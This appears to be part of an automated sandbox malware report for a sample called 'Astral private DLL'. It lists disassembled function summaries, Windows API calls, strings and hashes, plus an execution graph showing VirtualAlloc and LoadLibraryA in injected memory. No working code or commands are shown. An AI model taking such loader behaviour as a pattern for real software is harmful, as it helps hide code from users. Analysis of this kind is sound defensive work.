                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                • API String ID: 0-56093855
                                                                • Opcode ID: 8a96f024c748052e9811c3ed6fc1464c405e57b1cacc7a382ec867e617bdb117
                                                                • Instruction ID: b0a1f52587d4e5b32b99d9ea8271e1bae854b546bfb3912dd17d87945a1468f7
                                                                • Opcode Fuzzy Hash: 8a96f024c748052e9811c3ed6fc1464c405e57b1cacc7a382ec867e617bdb117
                                                                • Instruction Fuzzy Hash: B101B576604249AFCB215FA4FD44E963FB5FB09394B018025F90993A70C7319CD0DBA0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                • Instruction ID: ff88dd74f1786e1e9b04317b7a1f2b56ae6a87865d820aef73c5e41a0ad0019e
                                                                • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                • Instruction Fuzzy Hash: F0A13872A043869FDB25EF58C8917BEBBE5EF65310F1C41ADE4459B281C7358A41CB50
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00167F69,?,?,?), ref: 0016A3FA
                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00167F69,?), ref: 0016A43E
                                                                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00167F69,?,?,?,?,?,?,?), ref: 0016A4BF
                                                                • CloseHandle.KERNEL32(?,?,?,00000800,?,00167F69,?,?,?,?,?,?,?,?,?,?), ref: 0016A4C6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File$Create$CloseHandleTime
                                                                • String ID:
                                                                • API String ID: 2287278272-0
                                                                • Opcode ID: 4b4b092d81a68178c20a6f5c9fe7089a001f20ae5d41d3c79c4a973db27203e8
                                                                • Instruction ID: 7cb5d4b3d469b6a32ecd4346ef26efc8610cdcc42363ad167be03be849b9aa27
                                                                • Opcode Fuzzy Hash: 4b4b092d81a68178c20a6f5c9fe7089a001f20ae5d41d3c79c4a973db27203e8
                                                                • Instruction Fuzzy Hash: EA41C031288381AAD731DF24DC45FAEBBE4AF95700F48091DB5E5A3280DBA4DA58DF53
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID:
                                                                • API String ID: 176396367-0
                                                                • Opcode ID: 552e072f6e2bca12cf2cce1e65a9c724c3e4a86ac1353951121b3625602d8835
                                                                • Instruction ID: d37f4ef5bd67f9dcf015240ebc38089e4b821b3c56943faa23f98ab1a88d9ccf
                                                                • Opcode Fuzzy Hash: 552e072f6e2bca12cf2cce1e65a9c724c3e4a86ac1353951121b3625602d8835
                                                                • Instruction Fuzzy Hash: E841C171900669ABCB21EF68CC1A9EF7BB8EF15711F044029F955E7241DB30EE558BA0
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001891E0,?,00000000,?,00000001,?,?,00000001,001891E0,?), ref: 0018C9D5
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0018CA5E
                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00186CBE,?), ref: 0018CA70
                                                                • __freea.LIBCMT ref: 0018CA79
                                                                  • Part of subcall function 00188E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018CA2C,00000000,?,00186CBE,?,00000008,?,001891E0,?,?,?), ref: 00188E38
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                • String ID:
                                                                • API String ID: 2652629310-0
                                                                • Opcode ID: 90bcd0d008ae7da44a94b71655eee4bc5aafd681593f89d5f616d77aa2a0b5d9
                                                                • Instruction ID: 2a31f651011d6224f8dbd2172c51833d98cfeb2aa22be1f22747603244ed9fdc
                                                                • Opcode Fuzzy Hash: 90bcd0d008ae7da44a94b71655eee4bc5aafd681593f89d5f616d77aa2a0b5d9
                                                                • Instruction Fuzzy Hash: 6531B072A0021AABDF28EF74DC81DAE7BA5EB01310B144169FC15E7250EB35DE90CBE0
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 0017A666
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0017A675
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017A683
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0017A691
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CapsDevice$Release
                                                                • String ID:
                                                                • API String ID: 1035833867-0
                                                                • Opcode ID: b148211fdf8fbfbf6d9b202aa21b90f455d3226b7761addf26a568fba61d8ec9
                                                                • Instruction ID: f25ce067bdbf6c462cea7f5b9dbf36b19eb9b63240fa1fb9ae2c19ef5bf91ef7
                                                                • Opcode Fuzzy Hash: b148211fdf8fbfbf6d9b202aa21b90f455d3226b7761addf26a568fba61d8ec9
                                                                • Instruction Fuzzy Hash: 02E0EC33942721A7D2616B60AC0DF8E3E64EB0AB52F018101FA1596590DB64C6908BA1
                                                                APIs
                                                                  • Part of subcall function 0017A699: GetDC.USER32(00000000), ref: 0017A69D
                                                                  • Part of subcall function 0017A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0017A6A8
                                                                  • Part of subcall function 0017A699: ReleaseDC.USER32(00000000,00000000), ref: 0017A6B3
                                                                • GetObjectW.GDI32(?,00000018,?), ref: 0017A83C
                                                                  • Part of subcall function 0017AAC9: GetDC.USER32(00000000), ref: 0017AAD2
                                                                  • Part of subcall function 0017AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0017AB01
                                                                  • Part of subcall function 0017AAC9: ReleaseDC.USER32(00000000,?), ref: 0017AB99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ObjectRelease$CapsDevice
                                                                • String ID: (
                                                                • API String ID: 1061551593-3887548279
                                                                • Opcode ID: 4235df51d83fefb45505d74e01b3e4741096cd2f01c6e13faa0e33b0c7cd2e18
                                                                • Instruction ID: 33a155dbb34b2e95c3f1db02f73466b28bbae0e6c49c0891fdf844656d5cf58b
                                                                • Opcode Fuzzy Hash: 4235df51d83fefb45505d74e01b3e4741096cd2f01c6e13faa0e33b0c7cd2e18
                                                                • Instruction Fuzzy Hash: 6D91CD71608354AFD611DF25C844A6BBBF9FFC9701F00891EF59AD3260DB30A946CB62
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 001675E3
                                                                  • Part of subcall function 001705DA: _wcslen.LIBCMT ref: 001705E0
                                                                  • Part of subcall function 0016A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0016A598
                                                                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0016777F
                                                                  • Part of subcall function 0016A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0016A325,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A501
                                                                  • Part of subcall function 0016A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0016A325,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A532
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                • String ID: :
                                                                • API String ID: 3226429890-336475711
                                                                • Opcode ID: 2ae2d46051dd1a341b7904898281d3bcebe9de4d8845b8c521b8b759136cbbed
                                                                • Instruction ID: 29090ecaf1bc65230f8c58468529d301a33491a05466cf19860ec58dd5be9c67
                                                                • Opcode Fuzzy Hash: 2ae2d46051dd1a341b7904898281d3bcebe9de4d8845b8c521b8b759136cbbed
                                                                • Instruction Fuzzy Hash: D1419371800258AAEB25EB64CC59EEEB37CAF65300F0080D6B60AA3092DB745F95CF70
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: }
                                                                • API String ID: 176396367-4239843852
                                                                • Opcode ID: 29dc1b33cddbc1c58743500fccd36eb8d6c9e30c6e09d8949434009bc1eef113
                                                                • Instruction ID: 935bc8942f64cf2b1e335e2525a9bf2f06484de9775b6abfd07788f3f71eb5c5
                                                                • Opcode Fuzzy Hash: 29dc1b33cddbc1c58743500fccd36eb8d6c9e30c6e09d8949434009bc1eef113
                                                                • Instruction Fuzzy Hash: 1721237290830A5ADB31EA64D881F6FB3FCDFA1714F14442AF548C3141EB74DE4883A2
                                                                APIs
                                                                  • Part of subcall function 0016F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0016F2E4
                                                                  • Part of subcall function 0016F2C5: GetProcAddress.KERNEL32(001A81C8,CryptUnprotectMemory), ref: 0016F2F4
                                                                • GetCurrentProcessId.KERNEL32(?,?,?,0016F33E), ref: 0016F3D2
                                                                Strings
                                                                • CryptUnprotectMemory failed, xrefs: 0016F3CA
                                                                • CryptProtectMemory failed, xrefs: 0016F389
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CurrentProcess
                                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                • API String ID: 2190909847-396321323
                                                                • Opcode ID: 41705b867f9987532152bae3a62604cb8d5b8360510ceaf4ee127da2272c5109
                                                                • Instruction ID: ee543ab5bccbb0c609b174e0a16d87fe3f09c5abdeebf6c52168fc8d04b5f885
                                                                • Opcode Fuzzy Hash: 41705b867f9987532152bae3a62604cb8d5b8360510ceaf4ee127da2272c5109
                                                                • Instruction Fuzzy Hash: 8811E631A01629ABDF15AF28ED45A6E3754FF01760B04812EFC51AB391DB749E62C790
                                                                APIs
                                                                • _swprintf.LIBCMT ref: 0016B9B8
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: __vswprintf_c_l_swprintf
                                                                • String ID: %c:\
                                                                • API String ID: 1543624204-3142399695
                                                                • Opcode ID: ed260c5e0a125d7a27646c1da82d5f8838efff9f89bd90e5c72e78bbc28c29b1
                                                                • Instruction ID: 8058068aeb8734de167cef7e53d3568b8d00c6c7c0f5e98f474f0cf65984290f
                                                                • Opcode Fuzzy Hash: ed260c5e0a125d7a27646c1da82d5f8838efff9f89bd90e5c72e78bbc28c29b1
                                                                • Instruction Fuzzy Hash: DB01286350831179DA347BB98CC6D6BA7ACEFA17B0B40440AF554D7082EB30D9A0C3F1
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00010000,00171160,?,00000000,00000000), ref: 00171043
                                                                • SetThreadPriority.KERNEL32(?,00000000), ref: 0017108A
                                                                  • Part of subcall function 00166C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00166C54
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                • String ID: CreateThread failed
                                                                • API String ID: 2655393344-3849766595
                                                                • Opcode ID: fdec734f6e3bb32fcac13bb512798df977dc5b48d372402a5cf5375f05b85460
                                                                • Instruction ID: 4afe8b27e07181bcedcdab2919f2873aee958e2065663545d86469f51ef79992
                                                                • Opcode Fuzzy Hash: fdec734f6e3bb32fcac13bb512798df977dc5b48d372402a5cf5375f05b85460
                                                                • Instruction Fuzzy Hash: A601D6B93443097FD3305E68AD51B7673A9EB51751F20002EF68AA6180CBA168858624
                                                                APIs
                                                                  • Part of subcall function 0016E2E8: _swprintf.LIBCMT ref: 0016E30E
                                                                  • Part of subcall function 0016E2E8: _strlen.LIBCMT ref: 0016E32F
                                                                  • Part of subcall function 0016E2E8: SetDlgItemTextW.USER32(?,0019E274,?), ref: 0016E38F
                                                                  • Part of subcall function 0016E2E8: GetWindowRect.USER32(?,?), ref: 0016E3C9
                                                                  • Part of subcall function 0016E2E8: GetClientRect.USER32(?,?), ref: 0016E3D5
                                                                • GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                • SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                • String ID: 0
                                                                • API String ID: 2622349952-4108050209
                                                                • Opcode ID: afd5e9be6a0b7d988b20a7b8b6319f0a94ebfa718293e720f65daf889cd9a768
                                                                • Instruction ID: b6fda2db3ba25b0cec2c5ada56ba275f032350f4f0e385770011b269a01ea336
                                                                • Opcode Fuzzy Hash: afd5e9be6a0b7d988b20a7b8b6319f0a94ebfa718293e720f65daf889cd9a768
                                                                • Instruction Fuzzy Hash: D5F0AF34104288BADF550F608C0DBEA3FA9BF04364F0D8218FC4750AA1CB74C9A0EB10
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00171206,?), ref: 00170FEA
                                                                • GetLastError.KERNEL32(?), ref: 00170FF6
                                                                  • Part of subcall function 00166C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00166C54
                                                                Strings
                                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00170FFF
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                • API String ID: 1091760877-2248577382
                                                                • Opcode ID: 52d96a0061b5d5d1906e30130e930c15aec16ec13eda1a7bd863e9407c614520
                                                                • Instruction ID: 5b120f54400ef3a3fc39a4ee75f444b5cfe8c08cf7e59c04db3231002dfccd4f
                                                                • Opcode Fuzzy Hash: 52d96a0061b5d5d1906e30130e930c15aec16ec13eda1a7bd863e9407c614520
                                                                • Instruction Fuzzy Hash: 02D05E725089307BCA203338AD0AD6F79159B22731F644715F139B56E6CB254EE296A2
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,0016DA55,?), ref: 0016E2A3
                                                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0016DA55,?), ref: 0016E2B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FindHandleModuleResource
                                                                • String ID: RTL
                                                                • API String ID: 3537982541-834975271
                                                                • Opcode ID: b58b435925cce99874eb1ddeeffe52814dbee097cd9d4427f0c1f78b3606ace4
                                                                • Instruction ID: f0b8116c7137c7189852e75ad8a31f487b24715e42f454daf56866ee67d797ac
                                                                • Opcode Fuzzy Hash: b58b435925cce99874eb1ddeeffe52814dbee097cd9d4427f0c1f78b3606ace4
                                                                • Instruction Fuzzy Hash: D3C08C3124071066EF3027B47C0EF836E986B01B55F0D044EB291EA6E1DBE6C9C0C7E1

                                                                Execution Graph

                                                                Execution Coverage:0.3%
                                                                Dynamic/Decrypted Code Coverage:33.3%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:9
                                                                Total number of Limit Nodes:3
                                                                execution_graph 13950 24b34553930 13951 24b3455393d StrCmpNIW 13950->13951 13952 24b34553952 13950->13952 13951->13952 13953 24b34512908 13955 24b34512936 13953->13955 13954 24b34512aa7 13955->13954 13956 24b34512994 VirtualAlloc 13955->13956 13956->13954 13958 24b345129b8 13956->13958 13957 24b34512a2b LoadLibraryA 13957->13958 13958->13954 13958->13957

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019665355.0000024B34510000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024B34510000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34510000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: AllocLibraryLoadVirtual
                                                                • String ID:
                                                                • API String ID: 3550616410-0
                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                • Instruction ID: ed4262e34db381beaf2c198c6c54a619cdbbf383ec5aaf345cf64d037b9f7aba
                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
